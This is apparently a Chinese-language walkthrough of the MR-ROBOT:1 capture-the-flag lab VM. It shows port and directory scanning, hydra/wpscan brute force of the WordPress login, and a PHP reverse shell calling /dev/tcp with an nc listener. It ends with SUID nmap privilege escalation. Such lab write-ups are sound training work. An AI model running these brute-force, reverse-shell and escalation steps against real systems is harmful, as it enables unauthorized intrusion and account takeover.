MR-ROBOT:1

MR-ROBOT: 1

先打开看一下是咋样，转换成NAT模式：

我擦，今天这么顺利，不敢相信，开始拿下！！！！

信息搜集

端口扫描

rustscan -a 192.168.244.131 

Open 192.168.244.131:80
Open 192.168.244.131:443
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p  ")                                                                                                                                            
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-21 21:12 EST                                                         
Initiating Ping Scan at 21:12                                                                                                 
Scanning 192.168.244.131 [2 ports]                                                                                            
Completed Ping Scan at 21:12, 0.00s elapsed (1 total hosts)                                                                   
Initiating Parallel DNS resolution of 1 host. at 21:12                                                                         
Completed Parallel DNS resolution of 1 host. at 21:12, 2.18s elapsed                                                           
DNS resolution of 1 IPs took 2.18s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]                            
Initiating Connect Scan at 21:12                                                                                              
Scanning 192.168.244.131 [2 ports]                                                                                             
Discovered open port 80/tcp on 192.168.244.131                                                                                 
Discovered open port 443/tcp on 192.168.244.131                                                                               
Completed Connect Scan at 21:12, 0.00s elapsed (2 total ports)                                                                 
Nmap scan report for 192.168.244.131                                                                                           
Host is up, received syn-ack (0.00072s latency).                                                                               
Scanned at 2024-02-21 21:12:23 EST for 0s                                                                                                                       
PORT    STATE SERVICE REASON                                                                                                   
80/tcp  open  http    syn-ack                                                                                                 
443/tcp open  https   syn-ack                                                                                                 
Read data files from: /usr/bin/../share/nmap                                                                                   
Nmap done: 1 IP address (1 host up) scanned in 2.38 seconds

奇怪了，我又拿nmap扫了一下，扫出来了一个22端口。。。。

nmap -sV -T4 192.168.244.131

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-21 22:18 EST
Nmap scan report for 192.168.244.131
Host is up (0.00050s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
443/tcp open   ssl/http Apache httpd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.98 seconds

实地勘探

这靶场是真的炫酷哦！就和电影片段一样：

最后一个join有个填邮箱地址的地方，试试：

目录扫描

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.244.131 -f -t 1000 --no-error 

线程太小又太慢，线程开大又有的扫不到，只能耐心等辣！（没用上，但是等了一个多小时，还是把放上来了）

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.244.131
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Add Slash:               true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/blog/                (Status: 403) [Size: 214]
/video/               (Status: 403) [Size: 215]
/images/              (Status: 403) [Size: 216]
/admin/               (Status: 200) [Size: 1077]
/atom/                (Status: 301) [Size: 0] [--> http://192.168.244.131/feed/atom/]
/audio/               (Status: 403) [Size: 215]
/login/               (Status: 302) [Size: 0] [--> http://192.168.244.131/wp-login.php]
/rss/                 (Status: 301) [Size: 0] [--> http://192.168.244.131/feed/]
/feed/                (Status: 200) [Size: 815]
/0/                   (Status: 200) [Size: 8322]
/image/               (Status: 200) [Size: 11841]
/wp-content/          (Status: 200) [Size: 0]
/css/                 (Status: 403) [Size: 213]
/wp-login/            (Status: 200) [Size: 2703]
/rss2/                (Status: 301) [Size: 0] [--> http://192.168.244.131/feed/]
/wp-includes/         (Status: 403) [Size: 221]
/js/                  (Status: 403) [Size: 212]
/Image/               (Status: 200) [Size: 11841]
/rdf/                 (Status: 301) [Size: 0] [--> http://192.168.244.131/feed/rdf/]
/page1/               (Status: 301) [Size: 0] [--> http://192.168.244.131/]
/dashboard/           (Status: 302) [Size: 0] [--> http://192.168.244.131/wp-admin/]
/wp-admin/            (Status: 302) [Size: 0] [--> http://192.168.244.131/wp-login.php?redirect_to=http%3A%2F%2F192.168.244.131%2Fwp-admin%2F&reauth=1]
/phpmyadmin/          (Status: 403) [Size: 94]
/0000/                (Status: 200) [Size: 8322]
/xmlrpc/              (Status: 405) [Size: 42]
/IMAGE/               (Status: 200) [Size: 11739]
/wp-signup/           (Status: 302) [Size: 0] [--> http://192.168.244.131/wp-login.php?action=register]
/page01/              (Status: 301) [Size: 0] [--> http://192.168.244.131/]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================

闲着无事，手动看了几个目录：

http://192.168.244.131/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt

得到了第一个key！！！！

whatweb

whatweb 192.168.244.131
# http://192.168.244.131 [200 OK] Apache, Country[RESERVED][ZZ], HTML5, HTTPServer[Apache], IP[192.168.244.131], Script,UncommonHeaders[x-mod-pagespeed], X-Frame-Options[SAMEORIGIN]

Wappalyzer

漏洞利用

可以看到是WordPress的CMS，尝试看一下默认目录wp-admin：

我擦还真没改，尝试爆破：

太慢了，使用物理机进行扫描：

扫出来了一个用户名，尝试wpscan扫一下：(我是普通用户就不这么干了，太慢了)

wpscan --url http://192.168.244.131/wp-login.php -U Elliot -P fsocity.txt --api-token 'xxx'

也可以尝试hydra爆破：

hydra -L fsocity.dic  -p test  192.168.16.146 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:Invalid username"
# 查找用户名

# 直接爆破密码 我偷偷把密码放前面来了，不然密码在第八十多万位
hydra -vV -l elliot -P fsocity.dic 192.168.244.131 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect' -t 64

尝试登录：

上传一个远程反向shell连接脚本（插件上传或者放进主题）

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.244.128/1234 0>&1'");
?>

# kali
sudo nc -lvp 1234

提权

ls -la /home/robot
cat /home/robot/password.raw-md5
cat /home/robot/key-2-of-3.txt  

解密得到密码，尝试登录：

abcdefghijklmnopqrstuvwxyz

尝试登录不了，扩产成可执行的shell：

python -c 'import pty; pty.spawn("/bin/sh")'
su robot
cat /home/robot/key-2-of-3.txt

查看内核版本以及suid漏洞是否存在：

uname -a
lsb_release -a
find / -perm -u=s -type f 2>/dev/null

Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 14.04.2 LTS
Release:        14.04
Codename:       trusty

/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown

nmap是suid权限的，可以尝试利用！！！

nmap -v
# Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2024-02-22 06:00 UTC
# No target machines/networks specified!
# QUITTING!
nmap --interactive

然后获取最后一个key: